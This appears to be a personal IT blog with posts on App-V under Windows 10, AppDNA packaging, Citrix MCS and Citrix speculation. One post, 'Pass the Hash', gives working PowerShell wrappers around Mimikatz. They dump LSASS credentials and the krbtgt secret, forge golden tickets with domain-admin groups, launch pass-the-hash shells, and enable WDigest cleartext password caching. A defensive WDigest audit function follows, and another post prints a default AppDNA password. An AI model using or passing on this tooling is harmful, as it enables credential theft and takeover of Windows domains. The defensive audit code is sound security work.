Windows 10–1607 and App-V

With the new Windows 10 version in place, App-V is integrated into the operating system. You probably wonder what happens to a machine that gets an in-place upgrade while an App-V client is installed.

The cache stays, the App-V application gets uninstalled, and the App-V feature gets enabled. So it should be a flawless migration from Windows 10 1511 with a current App-V client to Windows 10 1607.



Pass the Hash

One of the main security issues with Windows is pass the hash. I added some functions to the Mimikatz PowerShell script that can be found here.


The functions make the usage of mimikatz easier. Just add these functions to the end of the mimikatz script and launch the script. The functions are then in memory, and the available functions will be listed.

# $ScriptPath must point to the folder holding the script and its log files; it is not set here.

Function Global:invoke-mimiDom {
    if (Test-Path "$ScriptPath\mimi_dom.log") {
        $MimiUser = "didi44"
        Write-Host $ScriptPath -ForegroundColor Green
        $global:mimidata = Get-Content "$ScriptPath\mimi_dom.log"
        # Read the values exported by invoke-MimiExportDom out of the log
        foreach ($line in $mimidata) {
            if ($line -match "aes256_hmac")    { $global:aes    = $($line.split(":")[1]).trim() }
            if ($line -match "Domain :")       { $global:domSid = $($line.split("/")[1]).trim() }
            if ($line -match "Default Salt :") { $global:domain = $($($line.split(":")[1]).trim()).replace("krbtgt","") }
        }
        $FullCMD = "kerberos::golden /domain:" + $domain + " /sid:" + $domSid + " /aes256:" + $aes + " /user:" + $MimiUser + " /id:500 /groups:500,501,513,512,520,518,519 /ticket:forged.kirbi"
        Write-Host $FullCMD
        Invoke-Mimikatz -Command "privilege::debug kerberos::purge `"$FullCMD`" `"kerberos::ptt forged.kirbi`" misc::cmd"
    } ELSE {
        Write-Host "there is no mimi_dom.log, please run first invoke-mimiexportdom on a domain controller" -ForegroundColor Red
    }
}

Function Global:invoke-mimiStd {
    $global:mimi_tmp = Invoke-Mimikatz
    $mimi_tmp | Out-File "$ScriptPath\mimi.log"
    $global:mimi = Get-Content "$ScriptPath\mimi.log"
    # Walk the log by index: mimikatz prints Username, Domain and NTLM on consecutive lines
    for ($number = 0; $number -lt $mimi.Count; $number++) {
        if ($mimi[$number] -match "\* Username : Administrator") {
            $Global:mimiUsername1 = $($mimi[$number].split(":")[1]).trim()
            $Global:mimiDom1      = $($mimi[$number+1].split(":")[1]).trim()
            $Global:mimiHash1     = $($mimi[$number+2].split(":")[1]).trim()
        }
    }
    Write-Host "$mimiUsername1 $mimiDom1 $mimiHash1"
}

FUNCTION Global:invoke-MimiExportDom {
    if (!(Test-Path "$ScriptPath\mimi_dom.log")) {
        $global:mimi_dom_tmp = Invoke-Mimikatz -Command "privilege::debug `"lsadump::lsa /inject /name:krbtgt`""
        $global:mimi_dom_tmp | Out-File "$ScriptPath\mimi_dom.log"
        $global:mimi_dom = Get-Content "$ScriptPath\mimi_dom.log"
    }
}

FUNCTION Global:Invoke-mimiDMP {
    $dmps = Get-ChildItem "$ScriptPath\*.dmp"
    foreach ($dmp in $dmps) {
        Write-Host "analysing $dmp" -ForegroundColor Green
        $global:mimi = Invoke-Mimikatz -Command "privilege::debug `"sekurlsa::minidump $dmp`" sekurlsa::logonpasswords"
        Write-Host $mimi
    }
}

FUNCTION Global:Invoke-mimicmd {
    if (-not $mimiUsername1) {
        Write-Host "please run first invoke-mimiSTD" -ForegroundColor Red
    } ELSE {
        $command = "privilege::debug `"sekurlsa::pth /user:" + $mimiUsername1 + " /domain:" + $mimiDom1 + " /ntlm:" + $mimiHash1 + " /run:cmd`""
        Write-Host "$command"
        $global:mimi = Invoke-Mimikatz -Command $command
    }
}

#sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH /run:COMMAND

# Turns on WDigest credential caching; takes effect at the next logon
If ($(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\SecurityProviders\WDigest\).UseLogonCredential -ne 1) {
    reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
    Write-Host "changed security provider - to see the password in cleartext log off and log on again" -ForegroundColor Yellow
}

Write-Host "the following functions are available:"
Write-Host "invoke-mimiStd" -ForegroundColor Green
Write-Host "invoke-mimiExportDom" -ForegroundColor Green
Write-Host "invoke-mimiDom" -ForegroundColor Green
Write-Host "invoke-mimiDmp" -ForegroundColor Green
Write-Host "invoke-mimiCMD" -ForegroundColor Green
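As an added defensive counterpart (not part of the original script): the block above switches WDigest's UseLogonCredential on, which makes LSASS keep cleartext passwords. The function below audits that value on one or more machines and can set it back to 0. It assumes PowerShell remoting is enabled on the targets; the function name is chosen here.

```powershell
# Added example, not from the original post: audit (and optionally reset) the
# WDigest UseLogonCredential value that the script above sets to 1.
# Assumes WinRM/PowerShell remoting is reachable on every name in -ComputerName.
function Test-WDigestCredentialCaching {
    [CmdletBinding()]
    param(
        [string[]]$ComputerName = $env:COMPUTERNAME,
        [switch]$Remediate
    )
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
    Invoke-Command -ComputerName $ComputerName -ArgumentList $key, $Remediate.IsPresent -ScriptBlock {
        param($key, $fix)
        $value = (Get-ItemProperty -Path $key -Name UseLogonCredential -ErrorAction SilentlyContinue).UseLogonCredential
        # Windows 8.1 / Server 2012 R2 and later treat a missing value as 0 (no cleartext caching);
        # older systems need KB2871997 installed and the value explicitly set to 0.
        $status = if ($value -eq 1) { 'EXPOSED' } elseif ($null -eq $value) { 'Default (0)' } else { 'Hardened' }
        if ($fix -and $value -ne 0) {
            Set-ItemProperty -Path $key -Name UseLogonCredential -Value 0 -Type DWord
            $status = 'Remediated'
        }
        [pscustomobject]@{
            Computer           = $env:COMPUTERNAME
            UseLogonCredential = $value
            Status             = $status
        }
    }
}

# Usage: Test-WDigestCredentialCaching -ComputerName 'srv01','srv02' -Remediate
```

A machine reporting EXPOSED still holds cleartext credentials in memory until the affected users log off, so a reboot or re-logon is needed after remediation.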


AppDNA – Invalid user name or password

After the first installation of AppDNA the default username to log on is

Administrator with the password apps3cur3

The problem is that this did not work for me. I was logged in with a domain admin account that was also named Administrator, and it seemed AppDNA always tried to log me in with this account.

After I changed the AppDNA username Administrator to Admin1 in the database, I could log in successfully.



Does Microsoft Buy Citrix?

I had a discussion with a colleague yesterday about what is happening with Citrix in the long term. My answer was: Microsoft will buy them! Why? There are multiple small pieces that, if you put them together, might form this picture:

1. The new Citrix CEO Kirill Tatarinov was originally working for Microsoft. Did you hear anything from him yet? I did not hear any noise except that his Synergy keynote was not very well received. Maybe he is not really interested in keynotes because he is preparing something else?

2. Citrix sold all departments that are totally not interesting for Microsoft, like the whole online stuff. Microsoft already has products in this area that would compete with it – like Skype for Business vs. GoToMeeting.

3. Microsoft retired TMG – so they have nothing at the endpoint to the internet – their new strategy is cloud first, mobile first – would NetScaler not fit perfectly?

4. Server 2016 has not many additional features announced for RDSH: an optimized gateway that hosts more users (indeed I heard they found a bug), MultiPoint Server, OpenGL support. That’s pretty much it – so probably they just don’t develop that much anymore.

5. ARA – Azure RemoteApp is lacking management for larger environments – the Citrix Cloud products allow this (they already run on Azure anyway).

So – I am curious what will happen in the future!


AppDNA AND APPv Part 1

Probably a hidden feature in AppDNA is the possibility to create App-V packages. This can happen fully automated. Honestly, I don’t see App-V in general as an OS compatibility mitigation technology. From my perspective it solves interoperability issues and might ease deployment.

But if you are allowed to use AppDNA, it is probably even a cool solution to optimize your current packaging process. What you need:

– AppDNA Server
– A VDI Sequencer machine
– A VDI machine with an App-V client
– A service account with local admin rights on the machines
– A service account that can control your VDI on the hypervisor (create snapshot and revert)

What you need in the first step is a hypervisor and a virtual machine. AppDNA will use this machine to create the sequence, but you can still interact during the sequencing process if you want. Prepare the following for step 1:

A virtual machine with an installed Sequencer; the “Citrix AppDNA VM Configuration.msi” needs to be installed. This tool allows the AppDNA server to talk to the virtual machine. Because the agent is started from the Run key, you should also enable Autologon, probably with the Sysinternals tool of the same name. This ensures that the agent starts after AppDNA resets the machine in a later step. Also don’t forget the standard cleanup tasks for your Sequencer machine, like disabling Windows Search or Defender. Now create a snapshot.

What you need then to do in AppDNA:

Configure –> Solutions –> AppV

Define a name for the solution


Define a network share (if you Test it tells you which files AppDNA would like to store there)


Here is the screen for defining the two VMS – the first is the sequencer the second a test machine – select “Add VM”




Define your hypervisor


The service account to manage your hypervisor


Select the sequencing machine


Select or create a snapshot and check “Do not show the VM Console”

After this step AppDNA will reset your virtual machine to the snapshot


Here you define the name of your virtual machine; you should use an FQDN. The port is the default port used by the AppDNA agent. If this fails, probably the computer is not logged in or AppDNA reverted to the wrong snapshot (happened to me under certain circumstances; now I only have one snapshot).


Define the output file share


Select what AppDNA should do with your VM


Here you get the summary


Repeat these steps for the second virtual machine.

You should get this then


Here you can choose No to speed things up.


Nearly ready


Define how AppV Packages should be generated.


You are ready – press close.

Now you can use this solution to sequence applications that were imported into AppDNA!



Citrix Machine creation service and SID

I was lately at a customer where we had some weird behavior, so we checked all kinds of stuff and realized that all machines had the same SID. From my perspective this should not be an issue since Mark Russinovich released this article. The only issue persists if two domain controllers have the same SID.

Then I checked with a couple of colleagues how it is in their environments, which run smoothly – and – all SIDs were the same. So it seems to be standard that MCS does not change the SID.

Another issue we found is that MCS always created full clones in a VMware-based environment. This should only happen in a XenServer environment. The problem is that the customer only had Terminal Server and not VDI, and MCS in combination with Terminal Server images has no choice of how the VMs should be deployed. If you look in Citrix Studio for the PowerShell command, you can see that the machines are created as full clones. That means if you want linked clones, you cannot use the console but need to use a PowerShell script.


BriForum London 2016

hi guys,

I am happy that I will attend BriForum London as a speaker on 19-20 May 2016.

I will speak about how people might have attacked your domain by using the pass-the-hash method. From my belief most domains should be “infected” because it is ridiculously easy. Hope to see you at BriForum. More content I will release here after my presentation. Attached is a tool that I might use – please do not use this tool on your computers!!!!

Test tool for my presentation
